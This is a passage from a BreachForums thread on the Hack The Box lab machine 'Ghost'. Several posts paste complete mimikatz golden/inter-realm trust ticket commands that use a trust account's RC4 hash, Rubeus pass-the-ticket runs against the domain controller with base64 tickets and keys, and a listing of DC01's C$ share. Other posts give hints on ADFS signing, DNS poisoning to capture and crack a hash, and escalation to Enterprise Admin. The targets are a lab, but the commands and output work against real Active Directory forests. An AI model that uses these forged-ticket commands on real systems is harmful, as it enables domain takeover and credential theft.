JOIN BREACHFORUMS TELEGRAM
Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
Breached
Member
Posts: 21
Threads: 0
Joined: Apr 2024
Reputation: 0
#151
Jul 17, 2024, 04:22 AM
(Jul 16, 2024, 09:54 PM)cutearmadillo Wrote:
(Jul 16, 2024, 09:46 PM)standby123 Wrote:
(Jul 16, 2024, 07:15 PM)cutearmadillo Wrote:
(Jul 16, 2024, 05:50 PM)standby123 Wrote: Any one has any idea on the ADFS ?
It accept the response with different message signature but the problem when trying to resign the assertion it returns 500

You gotta use the gmsa to sign your message and then it will be accepted by ADFS Wink

I am in GHOST-CORP do I need to access dc?

If you are in GHOST-CORP already then you do not need ADFS anymore.

Sounds like I need to get access to justin.bradley in order to read the password any hint about it?
Reply
Breached
Member
Posts: 10
Threads: 0
Joined: Sep 2023
Reputation: 0
#152
Jul 17, 2024, 12:48 PM (This post was last modified: Jul 17, 2024, 12:55 PM by floridaman389.)
[*]mimikatz # kerberos::golden /user:blahblah /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-000000000 /sids:S-1-5-21-4084500788-938703357-3654145966-512 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden_trust.kirbi
User      : blahblah
Domain    : CORP.GHOST.HTB (CORP)
SID      : S-1-5-21-2034262909-2733679486-000000000
User Id  : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-512 ;
ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt     
Service  : krbtgt
Target    : GHOST.HTB
Lifetime  : 7/17/2024 5:53:18 AM ; 7/15/2034 5:53:18 AM ; 7/15/2034 5:53:18 AM
-> Ticket : golden_trust.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz # exit
Bye!

[*]
PS C:\tmp> .\Rubeus.exe asktgs /ticket:C:\tmp\golden_trust.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap


  ______        _                     
  (_____ \      | |                   
  _____) )_  _| |__  _____ _  _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|  |_|____/|____/|_____)____/(___/

  v2.2.1

[*]Action: Ask TGS
[*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*]Building TGS-REQ request for: 'cifs/DC01.ghost.htb'
[*]Using domain controller: DC01.ghost.htb (10.10.11.24)
[+] TGS request successful!
[+] Ticket successfully imported!
[*]base64(ticket.kirbi):
      doIE4DCCBNygAwIBBaEDAgEWooID5jCCA+JhggPeMIID2qADAgEFoQsbCUdIT1NULkhUQqIhMB+gAwIBAqEYMBYbBGNpZnMbDkRDMDEuZ2hvc3QuaHRio4IDoTCCA52gAwIBEqEDAgEEooIDjwSCA4uUm2GHe+QiunyvwObke214RLSfN/sKQfarCVWTZFb+sUJ9Ob/tgWhIWX5zDbEF8EW/JQX+dQwsprV+XkuBYXg/7efPCc3hltPEBR0u3x0xz9reiPsYKvwY/66er6XX72ueSjI+8T/z6RrevFT0TaeS8tGbM9KgmJ+y0tUTRHTKjc1sy0LNJ3JmFQ9SqWw9UuDwUE3EhLQ1qlvBqmCo5x4oonurAiNCOquCzJc8mbX4cQiHvoR/xExfURajPee3XIHfvI1p7VIMGOLBIn96NGtWSAFRWfIEkTans5sk3/W/dZ6nM0w5focHADV6GFZSRps5r3a3GAgiNzyQymt+q9lYBvOCld8Vsn/vyZGAhyyOsphF0a2rLnXH3MQzcE8H1G3lgM9rf0xU6zDv9gMwvpVy3PBzpp/7V7EqP3owZ15unXWJ/L6WpMwxKshj6aV2Iy0V9a2vC5vhUVx9xtZRktPJTAsWU22FaLrbi27C30dIp0YPzieBJBZq5hGOGELW7GPLevYcsnJi8SgEtCaeEDtq+4HKHklLlLvkcZcpGXym5YAiFx8+6KoSt1WVClf6l73zNS23vIF7sIxxdMAXxm7t0UqD03s3mQaiIjZjcCbN1xNW6mZpFBiNTjVYRqOGgYozr+SR05mXz2Oz008SR4Gy4CLxRmZOVvTen7XS6xNMHeO/U8+qSJonZv+fncSyzlb4mAqsm+cLr858RSYEKbCRl+jwyYTdTtxdqgCP3gHBCVtbqTHnv7uWEb3ipEgHX0DfpevGFBEcuTSCH9c267Dfj8OwnGFCerp45GeQa+umoM5UNPxSVi0Q7NErcLopzKVeOzR9L8le2F2n7flog4RGaBdvWgxOKJb7eaGglXvloNGkVhiXBxjcdOf2S1eR5dS2EMaufAyXV6/tL+LatBtiNJuy3ar9cN13Y8ZnGHLzI+IMHyflQP3hqbuLpwsvRpqx4kl4zkn4E0w2/nNEptLF5h9sh+K6NmnvA8ENbXBXVX12a9JaGBM9zW6n1an0t1AShBXdpxfOISlQqUkypgAMRC/oqwiQfu+PmLvTZNc42TsZaRfX6DIWadoR3SvvRmGbUgiFB0LaLBh6vEO9+2sNTnrS1cWtU/fYIg+cUjKfq2Q1jq6VD63p3WSo9Kb72Xa0XbNgKI97GpjNpyUgPIm7Ynbfj3mHU2Yt9ciMEoLA+XqMGPOUbFvLoZ2po4HlMIHioAMCAQCigdoEgdd9gdQwgdGggc4wgcswgcigKzApoAMCARKhIgQgFFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO+hEBsOQ09SUC5HSE9TVC5IVEKiFTAToAMCAQGhDDAKGwhibGFoYmxhaKMHAwUAQKUAAKURGA8yMDI0MDcxNzEyNTMzN1qmERgPMjAyNDA3MTcyMjUzMzdapxEYDzIwMjQwNzI0MTI1MzM3WqgLGwlHSE9TVC5IVEKpITAfoAMCAQKhGDAWGwRjaWZzGw5EQzAxLmdob3N0Lmh0Yg==
  ServiceName              :  cifs/DC01.ghost.htb
  ServiceRealm            :  GHOST.HTB
  UserName                :  blahblah
  UserRealm                :  CORP.GHOST.HTB
  StartTime                :  7/17/2024 5:53:37 AM
  EndTime                  :  7/17/2024 3:53:37 PM
  RenewTill                :  7/24/2024 5:53:37 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  FFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO8=

PS C:\tmp> ls \\dc01.ghost.htb\C$
[*]
    Directory: \\dc01.ghost.htb\C$
Mode                LastWriteTime        Length Name                                                               
----                -------------        ------ ----                                                               
d-----          5/8/2021  1:20 AM                PerfLogs                                                           
d-r---          2/2/2024  8:17 PM                Program Files                                                       
d-----          2/2/2024  8:16 PM                Program Files (x86)                                                 
d-r---          2/4/2024  1:48 PM                Users                                                               
d-----        7/10/2024  3:08 AM                Windows                                                             
[*]
Something's fucking wrong with `GHOST$` account on the `PRIMARY` host

[*]Notice the user and SID that I set
[*]
If it's a golden ticket attack, it must use rc4 hash of the `krbtgt` account.
But in this case, rc4 hash must be of `GHOST$` account. Why is that?
is that because the `GHOST$` account is a trust account across the forest?
So this isn't technically a golden ticket attack, but rather modified one?
I bet this was misconfigured in the first place, but so many questions Huh
Reply
Banned

Posts: 32
Threads: 0
Joined: Jul 2023
Reputation: 0
#153
Jul 17, 2024, 02:22 PM
(Jul 17, 2024, 04:22 AM)standby123 Wrote:
(Jul 16, 2024, 09:54 PM)cutearmadillo Wrote:
(Jul 16, 2024, 09:46 PM)standby123 Wrote:
(Jul 16, 2024, 07:15 PM)cutearmadillo Wrote:
(Jul 16, 2024, 05:50 PM)standby123 Wrote: Any one has any idea on the ADFS ?
It accept the response with different message signature but the problem when trying to resign the assertion it returns 500

You gotta use the gmsa to sign your message and then it will be accepted by ADFS Wink

I am in GHOST-CORP do I need to access dc?

If you are in GHOST-CORP already then you do not need ADFS anymore.

Sounds like I need to get access to justin.bradley in order to read the password any hint about it?

If you are already in GHOST-CORP and I guess that means the PRIMARY server, you do not need to get to ADSF or justin anymore. You can escalate from there straight to Enterprise Admin and read both flags.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Reply
Breached
Member
Posts: 22
Threads: 1
Joined: Jun 2024
Reputation: 0
#154
Jul 17, 2024, 03:27 PM
PS C:\Users\Public\Documents> .\mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit

  .#####.  mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##      > https://blog.gentilkiwi.com/mimikatz
'## v ##'      Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi
User      : Administrator
Domain    : CORP.GHOST.HTB (CORP)
SID      : S-1-5-21-2034262909-2733679486-179904498-502
User Id  : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-519 ;
ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt     
Service  : krbtgt
Target    : GHOST.HTB
Lifetime  : 7/16/2024 1:40:24 PM ; 7/14/2034 1:40:24 PM ; 7/14/2034 1:40:24 PM
-> Ticket : golden.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!




PS C:\Users\Public\Documents> .\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt

  ______        _                     
  (_____ \      | |                   
  _____) )_  _| |__  _____ _  _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|  |_|____/|____/|_____)____/(___/

  v2.2.0

[*]Action: Ask TGS
[*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*]Building TGS-REQ request for: 'CIFS/dc01.ghost.htb'
[*]Using domain controller: dc01.ghost.htb (10.129.196.127)
[+] TGS request successful!
[+] Ticket successfully imported!
[*]base64(ticket.kirbi):
      doIFAjCCBP6gAwIBBaEDAgEWooIEAzCCA/9hggP7MIID96ADAgEFoQsbCUdIT1NULkhUQqIhMB+gAwIBAqEYMBYbBENJRlMbDmRjMDEuZ2hvc3QuaHRio4IDvjCCA7qgAwIBEqEDAgEEooIDrASCA6jTXtTedi1b8uZC+wp4ZjfD8PfM6W677xCtnjrt3QUCaOA28CXUDVrAbL9H1NdRld8KlzPCCY6tK1j6Q6VHKH02Wd0NBuLo/fH8Itz0hj5hZhKBehKpwV61DO0xes0zNweMl83GWK/Ddoj4eZ9Pqo5/GsHg5jMt626y6JyhtxwyYBB3aep38kWE+pz4JSKgHeH2KLD12Kmk7qGO2Hp5Zicj8d1C5sOgQa9yF+T7VBouuH1a8m/bNhBWW/iEfXesJw0FhkPDvbPqVpYVrJsG48+AY8lRw2R3zUbb4jdHBCDgIXhH7soPEB1gfvxctJPgYzmtTPgG7UcWiGhHR10N1y00UXIyzOl7QfFBUaZPoBNLVZcDrFkNpt0skJ7uhegajDeCiMs4mGvLTYosLJts9ZiF/zu2AW7jW6Me2UY2H50dO0qmntVoxswXNvJraNk5nDFA4VTYi4ZLPqZej+0D2kuHR9w+STQvg1Xj9zZ0RXwPUVV8VgCf0BG3fCfaeEKgCeXYw69zeQYgGYOgNay8HOWFq+Kc4k0exy+TJQPadKtOTA1PIYrJsSRN0V9hdOiV31wGu14acrPPOnvdzOay8I3HKNbxa+ni0Y8Gh5Z1cS/cd0TlRGWxZbTV893StKF+Okcezwn4l9jwr18X5+LpgtQAFSRd6ctw7BrUCPO6UFLgQM+qWeCm5M6We+EfmHsM6KvMfZdfFLLEw40VIE/I+L4v/LgLy5R/txWQl62PcIFZwkTytzMkhUQ2NmJMX+HF7UrD/EgQHf8CdATSahEjocw5IS08p8d6qVXWZwJAptMXAFtyk0ER416hD6mZaABrjYEZU/kUFScW1sdPc/R0fumfyxQlI0tVdbiibWxfYJmbzEIWZjGowbAswoFByr/r9pZYzgOW4RzyeUTDWNpQveJGqURdA+M9Z3wokDGx37I12rNDUd+LR6KQVvjSBcconoHCXJHZEc4z7Bglo0YP6yvnxSbCLlz+GY22wzDe3FG3BYEUSVR5iz106GSPpAucNZBaG88AKNdbNTThDoeTXo8d/j4YhJRxD2w7YP+6G2eq7sW0EHytwlF4ZZCDuGQkGymGNQS9ERflbwnRW1gNViE5zL4mjwjd8/Yj6PPbs+iyinn4JKui9TVLUsYe7cBk1AVBvg4VVgDe9bsj8CWpoCiaK7OMxwvfkIdNATPR3b5cJNuazuMOt3JIBBxS5Ud7RE0Gz8HSswFIPMPwbarWWEfFtj6ZkUzm7SGjgeowgeegAwIBAKKB3wSB3H2B2TCB1qCB0zCB0DCBzaArMCmgAwIBEqEiBCCLnrCNi9MXxP78ztC3hvQsN348Wk1kJR1A7QhYLouCY6EQGw5DT1JQLkdIT1NULkhUQqIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEClAAClERgPMjAyNDA3MTcxNTA1MDRaphEYDzIwMjQwNzE4MDEwNTA0WqcRGA8yMDI0MDcyNDE1MDUwNFqoCxsJR0hPU1QuSFRCqSEwH6ADAgECoRgwFhsEQ0lGUxsOZGMwMS5naG9zdC5odGI=
  ServiceName              :  CIFS/dc01.ghost.htb
  ServiceRealm            :  GHOST.HTB
  UserName                :  Administrator
  UserRealm                :  CORP.GHOST.HTB
  StartTime                :  7/17/2024 8:05:04 AM
  EndTime                  :  7/17/2024 6:05:04 PM
  RenewTill                :  7/24/2024 8:05:04 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  i56wjYvTF8T+/M7Qt4b0LDd+PFpNZCUdQO0IWC6LgmM=
PS C:\Users\Public\Documents> dir \\DC01.ghost.htb\c$
dir \\DC01.ghost.htb\c$
dir : Access is denied


still no access ;( 
can someone give me a hint what i'm doing wrong ?

Thx
Reply
Breached
Member
Posts: 21
Threads: 0
Joined: Apr 2024
Reputation: 0
#155
Jul 17, 2024, 05:47 PM
(Jul 17, 2024, 02:22 PM)cutearmadillo Wrote:
(Jul 17, 2024, 04:22 AM)standby123 Wrote:
(Jul 16, 2024, 09:54 PM)cutearmadillo Wrote:
(Jul 16, 2024, 09:46 PM)standby123 Wrote:
(Jul 16, 2024, 07:15 PM)cutearmadillo Wrote: You gotta use the gmsa to sign your message and then it will be accepted by ADFS Wink

I am in GHOST-CORP do I need to access dc?

If you are in GHOST-CORP already then you do not need ADFS anymore.

Sounds like I need to get access to justin.bradley in order to read the password any hint about it?

If you are already in GHOST-CORP and I guess that means the PRIMARY server, you do not need to get to ADSF or justin anymore. You can escalate from there straight to Enterprise Admin and read both flags.

Yes but this is the unintended way I have done it but I am trying to solve it using ADFS, and I am struggling with that
Reply
Breached
Member
Posts: 1
Threads: 0
Joined: Jul 2024
Reputation: 0
#156
Jul 17, 2024, 05:53 PM
(Jul 17, 2024, 03:27 PM)B00by Wrote: PS C:\Users\Public\Documents> .\mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit

  .#####.  mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##      > https://blog.gentilkiwi.com/mimikatz
'## v ##'      Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi
User      : Administrator
Domain    : CORP.GHOST.HTB (CORP)
SID      : S-1-5-21-2034262909-2733679486-179904498-502
User Id  : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-519 ;
ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt     
Service  : krbtgt
Target    : GHOST.HTB
Lifetime  : 7/16/2024 1:40:24 PM ; 7/14/2034 1:40:24 PM ; 7/14/2034 1:40:24 PM
-> Ticket : golden.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!




PS C:\Users\Public\Documents> .\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt

  ______        _                     
  (_____ \      | |                   
  _____) )_  _| |__  _____ _  _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|  |_|____/|____/|_____)____/(___/

  v2.2.0

[*]Action: Ask TGS
[*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*]Building TGS-REQ request for: 'CIFS/dc01.ghost.htb'
[*]Using domain controller: dc01.ghost.htb (10.129.196.127)
[+] TGS request successful!
[+] Ticket successfully imported!
[*]base64(ticket.kirbi):
      doIFAjCCBP6gAwIBBaEDAgEWooIEAzCCA/9hggP7MIID96ADAgEFoQsbCUdIT1NULkhUQqIhMB+gAwIBAqEYMBYbBENJRlMbDmRjMDEuZ2hvc3QuaHRio4IDvjCCA7qgAwIBEqEDAgEEooIDrASCA6jTXtTedi1b8uZC+wp4ZjfD8PfM6W677xCtnjrt3QUCaOA28CXUDVrAbL9H1NdRld8KlzPCCY6tK1j6Q6VHKH02Wd0NBuLo/fH8Itz0hj5hZhKBehKpwV61DO0xes0zNweMl83GWK/Ddoj4eZ9Pqo5/GsHg5jMt626y6JyhtxwyYBB3aep38kWE+pz4JSKgHeH2KLD12Kmk7qGO2Hp5Zicj8d1C5sOgQa9yF+T7VBouuH1a8m/bNhBWW/iEfXesJw0FhkPDvbPqVpYVrJsG48+AY8lRw2R3zUbb4jdHBCDgIXhH7soPEB1gfvxctJPgYzmtTPgG7UcWiGhHR10N1y00UXIyzOl7QfFBUaZPoBNLVZcDrFkNpt0skJ7uhegajDeCiMs4mGvLTYosLJts9ZiF/zu2AW7jW6Me2UY2H50dO0qmntVoxswXNvJraNk5nDFA4VTYi4ZLPqZej+0D2kuHR9w+STQvg1Xj9zZ0RXwPUVV8VgCf0BG3fCfaeEKgCeXYw69zeQYgGYOgNay8HOWFq+Kc4k0exy+TJQPadKtOTA1PIYrJsSRN0V9hdOiV31wGu14acrPPOnvdzOay8I3HKNbxa+ni0Y8Gh5Z1cS/cd0TlRGWxZbTV893StKF+Okcezwn4l9jwr18X5+LpgtQAFSRd6ctw7BrUCPO6UFLgQM+qWeCm5M6We+EfmHsM6KvMfZdfFLLEw40VIE/I+L4v/LgLy5R/txWQl62PcIFZwkTytzMkhUQ2NmJMX+HF7UrD/EgQHf8CdATSahEjocw5IS08p8d6qVXWZwJAptMXAFtyk0ER416hD6mZaABrjYEZU/kUFScW1sdPc/R0fumfyxQlI0tVdbiibWxfYJmbzEIWZjGowbAswoFByr/r9pZYzgOW4RzyeUTDWNpQveJGqURdA+M9Z3wokDGx37I12rNDUd+LR6KQVvjSBcconoHCXJHZEc4z7Bglo0YP6yvnxSbCLlz+GY22wzDe3FG3BYEUSVR5iz106GSPpAucNZBaG88AKNdbNTThDoeTXo8d/j4YhJRxD2w7YP+6G2eq7sW0EHytwlF4ZZCDuGQkGymGNQS9ERflbwnRW1gNViE5zL4mjwjd8/Yj6PPbs+iyinn4JKui9TVLUsYe7cBk1AVBvg4VVgDe9bsj8CWpoCiaK7OMxwvfkIdNATPR3b5cJNuazuMOt3JIBBxS5Ud7RE0Gz8HSswFIPMPwbarWWEfFtj6ZkUzm7SGjgeowgeegAwIBAKKB3wSB3H2B2TCB1qCB0zCB0DCBzaArMCmgAwIBEqEiBCCLnrCNi9MXxP78ztC3hvQsN348Wk1kJR1A7QhYLouCY6EQGw5DT1JQLkdIT1NULkhUQqIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEClAAClERgPMjAyNDA3MTcxNTA1MDRaphEYDzIwMjQwNzE4MDEwNTA0WqcRGA8yMDI0MDcyNDE1MDUwNFqoCxsJR0hPU1QuSFRCqSEwH6ADAgECoRgwFhsEQ0lGUxsOZGMwMS5naG9zdC5odGI=
  ServiceName              :  CIFS/dc01.ghost.htb
  ServiceRealm            :  GHOST.HTB
  UserName                :  Administrator
  UserRealm                :  CORP.GHOST.HTB
  StartTime                :  7/17/2024 8:05:04 AM
  EndTime                  :  7/17/2024 6:05:04 PM
  RenewTill                :  7/24/2024 8:05:04 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  i56wjYvTF8T+/M7Qt4b0LDd+PFpNZCUdQO0IWC6LgmM=
PS C:\Users\Public\Documents> dir \\DC01.ghost.htb\c$
dir \\DC01.ghost.htb\c$
dir : Access is denied


still no access ;( 
can someone give me a hint what i'm doing wrong ?

Thx

Do a kerberos::purge in mimikatz then do your TGS ask again.
Reply
Banned

Posts: 32
Threads: 0
Joined: Jul 2023
Reputation: 0
#157
Jul 17, 2024, 07:17 PM
(Jul 17, 2024, 05:47 PM)standby123 Wrote:
(Jul 17, 2024, 02:22 PM)cutearmadillo Wrote:
(Jul 17, 2024, 04:22 AM)standby123 Wrote:
(Jul 16, 2024, 09:54 PM)cutearmadillo Wrote:
(Jul 16, 2024, 09:46 PM)standby123 Wrote: I am in GHOST-CORP do I need to access dc?

If you are in GHOST-CORP already then you do not need ADFS anymore.

Sounds like I need to get access to justin.bradley in order to read the password any hint about it?

If you are already in GHOST-CORP and I guess that means the PRIMARY server, you do not need to get to ADSF or justin anymore. You can escalate from there straight to Enterprise Admin and read both flags.

Yes but this is the unintended way I have done it but I am trying to solve it using ADFS, and I am struggling with that

Within the intranet there's a discussion between justin and kathryn talking about a missing DNS entry. Set the DNS entry, receive a hash, crack it and proceed from there

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Reply
Breached
Member
Posts: 22
Threads: 1
Joined: Jun 2024
Reputation: 0
#158
Jul 17, 2024, 07:54 PM
thx @b4rfm0uth => kerberos::purge was the key.
Reply
VIP User
VIP
Posts: 116
Threads: 6
Joined: Mar 2024
Reputation: 17
#159
Jul 17, 2024, 09:16 PM
(Jul 17, 2024, 12:48 PM)floridaman389 Wrote:
[*]mimikatz # kerberos::golden /user:blahblah /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-000000000 /sids:S-1-5-21-4084500788-938703357-3654145966-512 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden_trust.kirbi
User      : blahblah
Domain    : CORP.GHOST.HTB (CORP)
SID      : S-1-5-21-2034262909-2733679486-000000000
User Id  : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-512 ;
ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt     
Service  : krbtgt
Target    : GHOST.HTB
Lifetime  : 7/17/2024 5:53:18 AM ; 7/15/2034 5:53:18 AM ; 7/15/2034 5:53:18 AM
-> Ticket : golden_trust.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz # exit
Bye!

[*]
PS C:\tmp> .\Rubeus.exe asktgs /ticket:C:\tmp\golden_trust.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap


  ______        _                     
  (_____ \      | |                   
  _____) )_  _| |__  _____ _  _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|  |_|____/|____/|_____)____/(___/

  v2.2.1

[*]Action: Ask TGS
[*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*]Building TGS-REQ request for: 'cifs/DC01.ghost.htb'
[*]Using domain controller: DC01.ghost.htb (10.10.11.24)
[+] TGS request successful!
[+] Ticket successfully imported!
[*]base64(ticket.kirbi):
      doIE4DCCBNygAwIBBaEDAgEWooID5jCCA+JhggPeMIID2qADAgEFoQsbCUdIT1NULkhUQqIhMB+gAwIBAqEYMBYbBGNpZnMbDkRDMDEuZ2hvc3QuaHRio4IDoTCCA52gAwIBEqEDAgEEooIDjwSCA4uUm2GHe+QiunyvwObke214RLSfN/sKQfarCVWTZFb+sUJ9Ob/tgWhIWX5zDbEF8EW/JQX+dQwsprV+XkuBYXg/7efPCc3hltPEBR0u3x0xz9reiPsYKvwY/66er6XX72ueSjI+8T/z6RrevFT0TaeS8tGbM9KgmJ+y0tUTRHTKjc1sy0LNJ3JmFQ9SqWw9UuDwUE3EhLQ1qlvBqmCo5x4oonurAiNCOquCzJc8mbX4cQiHvoR/xExfURajPee3XIHfvI1p7VIMGOLBIn96NGtWSAFRWfIEkTans5sk3/W/dZ6nM0w5focHADV6GFZSRps5r3a3GAgiNzyQymt+q9lYBvOCld8Vsn/vyZGAhyyOsphF0a2rLnXH3MQzcE8H1G3lgM9rf0xU6zDv9gMwvpVy3PBzpp/7V7EqP3owZ15unXWJ/L6WpMwxKshj6aV2Iy0V9a2vC5vhUVx9xtZRktPJTAsWU22FaLrbi27C30dIp0YPzieBJBZq5hGOGELW7GPLevYcsnJi8SgEtCaeEDtq+4HKHklLlLvkcZcpGXym5YAiFx8+6KoSt1WVClf6l73zNS23vIF7sIxxdMAXxm7t0UqD03s3mQaiIjZjcCbN1xNW6mZpFBiNTjVYRqOGgYozr+SR05mXz2Oz008SR4Gy4CLxRmZOVvTen7XS6xNMHeO/U8+qSJonZv+fncSyzlb4mAqsm+cLr858RSYEKbCRl+jwyYTdTtxdqgCP3gHBCVtbqTHnv7uWEb3ipEgHX0DfpevGFBEcuTSCH9c267Dfj8OwnGFCerp45GeQa+umoM5UNPxSVi0Q7NErcLopzKVeOzR9L8le2F2n7flog4RGaBdvWgxOKJb7eaGglXvloNGkVhiXBxjcdOf2S1eR5dS2EMaufAyXV6/tL+LatBtiNJuy3ar9cN13Y8ZnGHLzI+IMHyflQP3hqbuLpwsvRpqx4kl4zkn4E0w2/nNEptLF5h9sh+K6NmnvA8ENbXBXVX12a9JaGBM9zW6n1an0t1AShBXdpxfOISlQqUkypgAMRC/oqwiQfu+PmLvTZNc42TsZaRfX6DIWadoR3SvvRmGbUgiFB0LaLBh6vEO9+2sNTnrS1cWtU/fYIg+cUjKfq2Q1jq6VD63p3WSo9Kb72Xa0XbNgKI97GpjNpyUgPIm7Ynbfj3mHU2Yt9ciMEoLA+XqMGPOUbFvLoZ2po4HlMIHioAMCAQCigdoEgdd9gdQwgdGggc4wgcswgcigKzApoAMCARKhIgQgFFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO+hEBsOQ09SUC5HSE9TVC5IVEKiFTAToAMCAQGhDDAKGwhibGFoYmxhaKMHAwUAQKUAAKURGA8yMDI0MDcxNzEyNTMzN1qmERgPMjAyNDA3MTcyMjUzMzdapxEYDzIwMjQwNzI0MTI1MzM3WqgLGwlHSE9TVC5IVEKpITAfoAMCAQKhGDAWGwRjaWZzGw5EQzAxLmdob3N0Lmh0Yg==
  ServiceName              :  cifs/DC01.ghost.htb
  ServiceRealm            :  GHOST.HTB
  UserName                :  blahblah
  UserRealm                :  CORP.GHOST.HTB
  StartTime                :  7/17/2024 5:53:37 AM
  EndTime                  :  7/17/2024 3:53:37 PM
  RenewTill                :  7/24/2024 5:53:37 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  FFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO8=

PS C:\tmp> ls \\dc01.ghost.htb\C$
